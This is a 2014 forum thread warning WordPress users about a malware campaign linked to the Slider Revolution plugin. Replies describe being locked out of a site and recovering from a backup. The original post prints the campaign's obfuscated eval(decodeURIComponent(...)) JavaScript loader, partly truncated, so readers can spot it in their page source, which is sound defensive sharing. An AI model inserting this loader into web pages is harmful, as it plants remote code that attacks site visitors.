Question

WordPress Malware...check your sites!

Posted December 16, 2014 4.2k views

Looks like another WordPress exploit.:
Some 100,000 or more WordPress sites infected by mysterious malware

Just checked all my sites and they look good. I did not bother using the suggested site scanner, but rather looked at the source code of all pages, since this:

“The in-the-wild attack observed by Sucuri causes infected sites to load highly obfuscated attack code on every webpage that includes the following:”

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

From what I have read, this was specific to sites using Slider Revolution, a premium WordPress plugin/

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

×
2 answers

Thank you so much for posting this, my entire site got it’s poo pushed in.

Thank god I used a backup plugin.

The attack blocked me out of my admin panel, corrupted the entire website - I’m still learning on Wordpress stuff, so I would’ve lost 5 months without a backup plugin.

Thanks for posting this, I’ve disabled the slide plugin right away.

TO check, use websites like https://www.virustotal.com/ for URL scanner !!

Submit an Answer